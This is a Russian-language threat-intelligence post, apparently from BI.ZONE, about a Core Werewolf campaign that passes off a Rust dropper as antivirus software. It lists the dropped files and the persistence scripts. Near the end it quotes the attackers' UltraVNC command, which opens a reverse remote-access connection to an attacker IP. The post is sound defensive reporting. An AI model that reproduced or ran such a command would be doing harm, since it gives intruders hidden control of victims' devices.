Оборотень в антивирусном наряде: Core Werewolf мимикрирует под защитный софт — 16 сентября 2026 г. в 11:05:02.015
Оборотень в антивирусном наряде: Core Werewolf мимикрирует под защитный софт В сентябре специалисты BI.ZONE Threat Intelligence зафиксировали активность кластера Core Werewolf. В рамках новой кампании группировка маскировала вредоносный файл под антивирусное ПО. 🔵 Атакующие распространяли ВПО под именем ZOV_Antivirus.exe. 🔵 Использовали инструмент удаленного доступа UltraVNC, хотя не так давно уже меняли его на самописный CoreRAT. 🔵 Нагрузка распространялась в составе Rust-дропера. Технические детали кампании: Предположительно, злоумышленники рассылали фишинговые письма с архивом, содержащим исполняемый файл ZOV_Antivirus.exe, который являлся Rust-дропером. После запуска жертвой дропер выполняет команду и создает на диске следующие файлы: – ZOV_Antivirus.pdf — отвлекающий документ. – stunning.exe — консольная версия утилиты WinRAR. – subsidy.rar — зашифрованный RAR-архив, содержащий дополнительные файлы. RAR-архив содержит: – pasos.exe — экземпляр UltraVNC версии файла 1.6.4.0. – burial.cmd — скрипт для закрепления в системе через планировщик задач. – cognitive.cmd — скрипт, запускающий UltraVNC. После демонстрации отвлекающего документа и закрепления в системе в фоновом режиме происходит инсталляция инструмента UltraVNC: %HOMEPATH%\Links\pasos.exe' '-sc_prompt -autoreconnect ID:[user volume id]-Oq4VKM -connect 185.244.182[.]221:443 -run' В итоге атакующие получают контроль над скомпрометированным устройством. Подробнее о техниках Core Werewolf мы писали в нашем блоге. Также про Rust-дроппер мы писали в одном из прошлых постов.

